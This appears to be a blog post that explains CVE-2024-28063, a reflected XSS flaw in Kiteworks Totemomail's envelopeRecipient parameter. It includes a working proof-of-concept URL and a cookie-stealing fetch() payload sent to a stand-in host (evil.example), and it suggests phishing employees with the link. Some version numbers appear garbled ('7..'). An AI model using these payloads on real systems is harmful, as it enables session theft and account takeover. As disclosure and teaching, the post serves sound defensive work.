---
CVE-2024-28063 is a critical reflected cross-site scripting (XSS) vulnerability in Kiteworks Totemomail (all versions up to 7..). It lets attackers inject JavaScript via /responsiveUI/EnvelopeOpenServlet?envelopeRecipient= and steal session data, impersonate users, or run actions on email content. In this post, we'll break down this vulnerability, show you how it's exploited, and provide tips on fixing it. This is an exclusive, plain-language guide—get comfortable and let's dig in.
What is Kiteworks Totemomail?
Kiteworks Totemomail is an enterprise email security platform, mostly used for secure transfer and encryption of messages in regulated industries. Companies trust it for business-critical and confidential communication.
About the Vulnerability (Reflected XSS, CVE-2024-28063)
Reflected cross-site scripting (XSS) is one of the oldest and most dangerous web bugs. It happens when data you send in a URL or a form is "reflected" straight back into a web page without being filtered or encoded. If JavaScript sent by an attacker is echoed back, it runs in the victim's browser—with all of their cookies, secrets, and permissions.
In this case, a key parameter envelopeRecipient in the servlet /responsiveUI/EnvelopeOpenServlet is vulnerable.
Technical Details
*Product:* Kiteworks Totemomail
*Versions Affected:* <= 7..
*Component:* /responsiveUI/EnvelopeOpenServlet
*Vulnerable Parameter:* envelopeRecipient
*Type:* Reflected XSS (OWASP XSS)
When you visit
https://yourmail.example.com/responsiveUI/EnvelopeOpenServlet?envelopeRecipient=<payload>;
The value of envelopeRecipient is placed back into the HTML page without any escaping. JavaScript you put there will execute in whoever clicks the link.
Proof of Concept (PoC)
Here's a simple way to test the XSS. (Never run tests against sites you don’t own or have consent to test!)
Click (or tell your user to click)
https://yourmail.example.com/responsiveUI/EnvelopeOpenServlet?envelopeRecipient=%3Cscript%3Ealert(document.cookie)%3C/script%3E
The URL-decoded version is
https://yourmail.example.com/responsiveUI/EnvelopeOpenServlet?envelopeRecipient=<script>alert(document.cookie)</script>;
As soon as the URL is loaded, a popup shows their cookies. You can swap alert(document.cookie) for virtually any JavaScript you want.
Example: Exfiltrate Session Cookies
<script>
fetch("https://evil.example/bc?c="; + encodeURIComponent(document.cookie));
</script>
Encoded in the URL
https://yourmail.example.com/responsiveUI/EnvelopeOpenServlet?envelopeRecipient=%3Cscript%3Efetch(%22https://evil.example/bc?c=%22+encodeURIComponent(document.cookie));%3C/script%3E
Any email recipient or internal user who clicks your crafted URL will send their session details to your server.
Phish employees
Administrators often have elevated access, meaning XSS here can compromise the whole organization.
Detection and Verification
To verify, you can intercept a request to /EnvelopeOpenServlet and set the envelopeRecipient to a script tag. If your script runs, the site is vulnerable.
Use your browser's Developer Tools (F12) and see where your payload lands in the HTML source.
Official References and Further Reading
- NVD Entry: CVE-2024-28063
- Kiteworks Security Advisories
- OWASP XSS
- Mitre CVE Record
How to Fix
- Update Totemomail to the latest fixed version (check Kiteworks advisories).
Use web application firewalls (WAFs) to block typical XSS payloads.
- Apply Content Security Policy (CSP) headers.
> Don’t rely on filters or client-side fixes—patch your installation!
Summary
CVE-2024-28063 is a dangerous, trivial-to-exploit bug in Kiteworks Totemomail (<=7..). If your instance is exposed, attackers can make anyone run JavaScript simply by clicking a crafted link. Update immediately and audit your applications for similar vulnerabilities.
Stay safe—and audit your tools regularly!
*This guide is for educational and defensive purposes. Never exploit systems without permission.*
Timeline
Published on: 05/18/2024 22:15:07 UTC
Last modified on: 07/03/2024 01:51:26 UTC